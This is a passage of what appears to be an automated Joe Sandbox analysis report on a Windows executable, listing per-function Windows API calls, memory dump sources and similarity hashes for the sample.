                                                                                                                • __EH_prolog.LIBCMT ref: 0047A726
                                                                                                                  • Part of subcall function 004C5707: CreateFileA.KERNEL32(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000), ref: 004C57E2
                                                                                                                  • Part of subcall function 004C5707: GetLastError.KERNEL32 ref: 004C57F4
                                                                                                                  • Part of subcall function 004C585E: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004C5879
                                                                                                                  • Part of subcall function 004C585E: GetLastError.KERNEL32(?), ref: 004C5886
                                                                                                                  • Part of subcall function 004C5901: FlushFileBuffers.KERNEL32(?,0047A7C1,?,00000001), ref: 004C590A
                                                                                                                  • Part of subcall function 004C5901: GetLastError.KERNEL32(00000000,?,00000001), ref: 004C5915
                                                                                                                  • Part of subcall function 004C5922: CloseHandle.KERNEL32(00000001,00000000,?,004C5679,?,?,004CDE5C,?,?,?,004A8EBA,00000004,00000000), ref: 004C5931
                                                                                                                  • Part of subcall function 004C5922: GetLastError.KERNEL32(00000000,004C5679,?,?,004CDE5C,?,?,?,004A8EBA,00000004,00000000), ref: 004C5956
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$File$BuffersCloseCreateFlushH_prologHandleWrite
                                                                                                                • String ID: ThN
                                                                                                                • API String ID: 1722101560-2830422598
                                                                                                                • Opcode ID: 5e8ecb4cf2e334177cc7e4abe5db696f3d3a67f3c651340ec4908bcbeeb1b8ee
                                                                                                                • Instruction ID: 00189b88981aa960947ce172797e1d39146f8fd293fe99c96172c1ad861633a2
                                                                                                                • Opcode Fuzzy Hash: 5e8ecb4cf2e334177cc7e4abe5db696f3d3a67f3c651340ec4908bcbeeb1b8ee
                                                                                                                • Instruction Fuzzy Hash: 57214776901618DFCF14EFA5C885AEDB7B1FF18314F10856EE012B32A1DB786A48CB24
                                                                                                                APIs
                                                                                                                • GetSystemDefaultLangID.KERNEL32(0047F21C,0047EC91,?,00000004,00000000,00000001), ref: 0047B985
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DefaultLangSystem
                                                                                                                • String ID: _tblErrorMessages
                                                                                                                • API String ID: 706401283-1976560367
                                                                                                                • Opcode ID: 902c286f601d5eae689c54cafe6f3628ede8c1e0ceecc499293eb5bc370a72e9
                                                                                                                • Instruction ID: 346606b756231b536953adf72d7b54d576af0992655c45f2cca79c78c9d2f5e8
                                                                                                                • Opcode Fuzzy Hash: 902c286f601d5eae689c54cafe6f3628ede8c1e0ceecc499293eb5bc370a72e9
                                                                                                                • Instruction Fuzzy Hash: 16F0E9F22154202ED611365DAC02FFE218CCF86314F14416BFA54D6291DB5C994383EE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c316a9602e4623095da9dfd54cf9e0d6acf79ee30604b10317fdb1c0597f63a6
                                                                                                                • Instruction ID: bf76858b1990c32746246190158fa3ec8d5d5e743f5932e50630ea11d1a7f067
                                                                                                                • Opcode Fuzzy Hash: c316a9602e4623095da9dfd54cf9e0d6acf79ee30604b10317fdb1c0597f63a6
                                                                                                                • Instruction Fuzzy Hash: 8CA1B0756057018FE320CF28D980BA7B3E5FFA5304F14492EE89AC7341EB78E8059B29
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,00000000,00000000,?,0049AF7F,00000000), ref: 0049F81A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value
                                                                                                                • String ID:
                                                                                                                • API String ID: 3702945584-0
                                                                                                                • Opcode ID: 2b8b88667d06c803f98b7dc261c484fcb306df7f6fa4f83481945ea21d8f7932
                                                                                                                • Instruction ID: 1aeaa06c8df3684af671a8d8fda7723af0044c40e3557516b71e1c92725c94d8
                                                                                                                • Opcode Fuzzy Hash: 2b8b88667d06c803f98b7dc261c484fcb306df7f6fa4f83481945ea21d8f7932
                                                                                                                • Instruction Fuzzy Hash: CE5186B16057015AEB30AF799880B97F7E4FF98324F204B3FE46EC2681EB3458488759
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047A806
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                • SetFileAttributesA.KERNEL32(00000000,00000080,?,?,0000005C,?,00000000,?,00000000,00000000), ref: 0047A8C7
                                                                                                                  • Part of subcall function 004C281A: __EH_prolog.LIBCMT ref: 004C281F
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5922: CloseHandle.KERNEL32(00000001,00000000,?,004C5679,?,?,004CDE5C,?,?,?,004A8EBA,00000004,00000000), ref: 004C5931
                                                                                                                  • Part of subcall function 004C5922: GetLastError.KERNEL32(00000000,004C5679,?,?,004CDE5C,?,?,?,004A8EBA,00000004,00000000), ref: 004C5956
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$AttributesCloseDecrementErrorFileHandleInterlockedLastlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1742860936-0
                                                                                                                • Opcode ID: 0ed311f827036211862ca8fc8b749643e372c0c094b1fb604e8566b9580dc102
                                                                                                                • Instruction ID: ccd50a9f3a6c29ef31feaec7ee8cdf20a60450543787713fc784431bb4390dcd
                                                                                                                • Opcode Fuzzy Hash: 0ed311f827036211862ca8fc8b749643e372c0c094b1fb604e8566b9580dc102
                                                                                                                • Instruction Fuzzy Hash: BF419D75900659EACB05EBA5C845FEEBB74EF14314F00812FE416B3281DB786A45CBAA
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C5A33: __EH_prolog.LIBCMT ref: 004C5A38
                                                                                                                  • Part of subcall function 004C5A33: GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 004C5A56
                                                                                                                  • Part of subcall function 004C5A33: lstrcpyn.KERNEL32(?,?,00000104), ref: 004C5A65
                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000), ref: 004C57E2
                                                                                                                • GetLastError.KERNEL32 ref: 004C57F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorFileFullH_prologLastNamePathlstrcpyn
                                                                                                                • String ID:
                                                                                                                • API String ID: 1034715445-0
                                                                                                                • Opcode ID: 6d38484deed9a40803fb6abaf1b54e397960bf1baa528ec21d3e07e475994efb
                                                                                                                • Instruction ID: 89fa6537c64a306c62f5a088e79b6758710ea596ac8f4686efb3338968ddd2ce
                                                                                                                • Opcode Fuzzy Hash: 6d38484deed9a40803fb6abaf1b54e397960bf1baa528ec21d3e07e475994efb
                                                                                                                • Instruction Fuzzy Hash: 9D312939A01B05DBEB649B15CC85FAF73A5AB80354F20852FE416CB2D0C678F9C48B58
                                                                                                                APIs
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004CAB8D
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004CABD7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePeek
                                                                                                                • String ID:
                                                                                                                • API String ID: 2222842502-0
                                                                                                                • Opcode ID: 215b89fe22961723de51274be0940137a498c8c9a333aba34d4a41fec9f83147
                                                                                                                • Instruction ID: bd634bf906d14818fa7c8b9dad07b23b1e4d82265597cd3d82aae38b259c628e
                                                                                                                • Opcode Fuzzy Hash: 215b89fe22961723de51274be0940137a498c8c9a333aba34d4a41fec9f83147
                                                                                                                • Instruction Fuzzy Hash: 21115E7530420DAFE7609E25AC84E2BB79DFB80799B00046EF64286201EB25AD158766
                                                                                                                APIs
                                                                                                                • LoadMenuA.USER32(?,?), ref: 004D017A
                                                                                                                • DestroyMenu.USER32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 004D01E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DestroyLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 588275208-0
                                                                                                                • Opcode ID: 7596b89a4ac6685dfe2e65d1b7070ce6ed25e47a6a922e6c9adf3a707fe9cf7e
                                                                                                                • Instruction ID: d61048c68c926c68c87fccef6c954df2096ca217fb81c488b69ed57e012997c5
                                                                                                                • Opcode Fuzzy Hash: 7596b89a4ac6685dfe2e65d1b7070ce6ed25e47a6a922e6c9adf3a707fe9cf7e
                                                                                                                • Instruction Fuzzy Hash: A4118275210105AFDB148F65DC94EAF7BAAEF98360F15812BF90587321CA76DC118B64
                                                                                                                APIs
                                                                                                                • IsDBCSLeadByte.KERNEL32(?,00000520,00000000,00000318,00000000,0049DC32,00000318,?), ref: 004A1B77
                                                                                                                • CharNextA.USER32(0049DC32,00000520,00000000,00000318,00000000,0049DC32,00000318,?), ref: 004A1B85
                                                                                                                 Memory Dump Source
                                                                                                                 • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                 • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                 Similarity
                                                                                                                 • API ID: ByteCharLeadNext
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNEL32(?,00000003,?,00000003,?,00000000,00000000,?,0049AAF3,?,?,?,00000000), ref: 004A2EFB
                                                                                                                • GetLastError.KERNEL32(?,0049AAF3,?,?,?,00000000), ref: 004A2F08
                                                                                                                 Similarity
                                                                                                                 • API ID: ErrorFileLastPointer
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004C66B7
                                                                                                                • GetWindow.USER32(?,00000004), ref: 004C66D4
                                                                                                                  • Part of subcall function 004C95B9: IsWindowEnabled.USER32(?), ref: 004C95C3
                                                                                                                 Similarity
                                                                                                                 • API ID: Window$EnabledLongRect
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 004CDA08
                                                                                                                • GetWindowTextA.USER32(00000000,00000000,00000000), ref: 004CDA1D
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                 Similarity
                                                                                                                 • API ID: TextWindow$Lengthlstrlen
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,004CBEC9,00000000,00000000,00000000,00000000,?,00000000,?,004C2313,00000000,00000000,00000000,00000000,004B2186), ref: 004D49D8
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,00000000,?,004C2313,00000000,00000000,00000000,00000000,004B2186,00000000), ref: 004D49DF
                                                                                                                  • Part of subcall function 004D4A32: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 004D4A63
                                                                                                                  • Part of subcall function 004D4A32: lstrcpy.KERNEL32(?,.HLP), ref: 004D4B04
                                                                                                                  • Part of subcall function 004D4A32: lstrcat.KERNEL32(?,.INI), ref: 004D4B31
                                                                                                                 Similarity
                                                                                                                 • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
                                                                                                                APIs
                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004C5879
                                                                                                                • GetLastError.KERNEL32(?), ref: 004C5886
                                                                                                                 Similarity
                                                                                                                 • API ID: ErrorFileLastWrite
                                                                                                                APIs
                                                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,004B2104,00000001), ref: 004B6F4B
                                                                                                                  • Part of subcall function 004B6DF2: GetVersionExA.KERNEL32 ref: 004B6E11
                                                                                                                • HeapDestroy.KERNEL32 ref: 004B6F8A
                                                                                                                  • Part of subcall function 004B6F97: RtlAllocateHeap.NTDLL(00000000,00000140,004B6F73), ref: 004B6FA4
                                                                                                                 Similarity
                                                                                                                 • API ID: Heap$AllocateCreateDestroyVersion
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,0049F319,00000318), ref: 0049D397
                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,08000080,00000000), ref: 0049D3C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3000843052-0
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004CAB13
                                                                                                                • SetWindowsHookExA.USER32(000000FF,004CAE55,00000000,00000000), ref: 004CAB23
                                                                                                                  • Part of subcall function 004D490D: __EH_prolog.LIBCMT ref: 004D4912
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentH_prologHookThreadWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2183259885-0
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?,0049AAFB,?,?,?,?,?,?,?,?,?,?,?,0049F866,?), ref: 0049FA79
                                                                                                                • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,0049AAFB), ref: 0049FA98
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileReadValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2860046521-0
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,0049DC48), ref: 0049ACB7
                                                                                                                • CreateFileA.KERNEL32(00008CFC,80000000,00000003,00000000,00000003,08000080,00000000), ref: 0049ACE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3000843052-0
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,?,004E6854,00406F01,?,00000000,00000000), ref: 004C58B7
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 004C58C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2976181284-0
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(100040CD,?,100040CD,00000000,00000000,00000000,?,?,00000000,?,?,?,?,1001C05C,1001C030), ref: 10004C86
                                                                                                                • SetFileAttributesA.KERNEL32(100040CD,00000000,?,100040CD,00000000,00000000,00000000,?,?,00000000,?,?,?,?,1001C05C,1001C030), ref: 10004C98
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,0049F621), ref: 0049D3E7
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0049D406
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 492146193-0
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 004AF2C6
                                                                                                                  • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                                                  • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 1616793339-0
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,00000000,00000010,?,?,004AF278,00000009,?), ref: 004AF18C
                                                                                                                  • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                                                  • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterFreeHeapInitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 641406236-0
                                                                                                                APIs
                                                                                                                • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C6FEE
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                APIs
                                                                                                                • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 004D0735
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047EF1A
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0047FCF1: __EH_prolog.LIBCMT ref: 0047FCF6
                                                                                                                  • Part of subcall function 0047A801: __EH_prolog.LIBCMT ref: 0047A806
                                                                                                                  • Part of subcall function 0047A801: SetFileAttributesA.KERNEL32(00000000,00000080,?,?,0000005C,?,00000000,?,00000000,00000000), ref: 0047A8C7
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$AttributesDecrementFileIncrement
                                                                                                                • String ID:
                                                                                                                • API String ID: 3755930061-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                                                • SendMessageA.USER32(?,0000036E,?,00000000), ref: 004C675F
                                                                                                                Similarity
                                                                                                                • API ID: LongMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3360111000-0
                                                                                                                APIs
                                                                                                                • PostMessageA.USER32(?,00000362,0000E001,00000000), ref: 004D02D5
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004791DF
                                                                                                                  • Part of subcall function 004D3DE1: __EH_prolog.LIBCMT ref: 004D3DE6
                                                                                                                  • Part of subcall function 004D3DE1: GetCurrentThread.KERNEL32 ref: 004D3E34
                                                                                                                  • Part of subcall function 004D3DE1: GetCurrentThreadId.KERNEL32 ref: 004D3E3D
                                                                                                                  • Part of subcall function 0046D587: __EH_prolog.LIBCMT ref: 0046D58C
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$CurrentThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 37307217-0
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00404141,?,00404C1E,?,?,0040194C,?,?,?,00401643), ref: 0040535D
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                APIs
                                                                                                                • RegCloseKey.KERNEL32(?,?,0040413A,?,00404C1E,?,?,0040194C,?,?,?,00401643), ref: 00405331
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
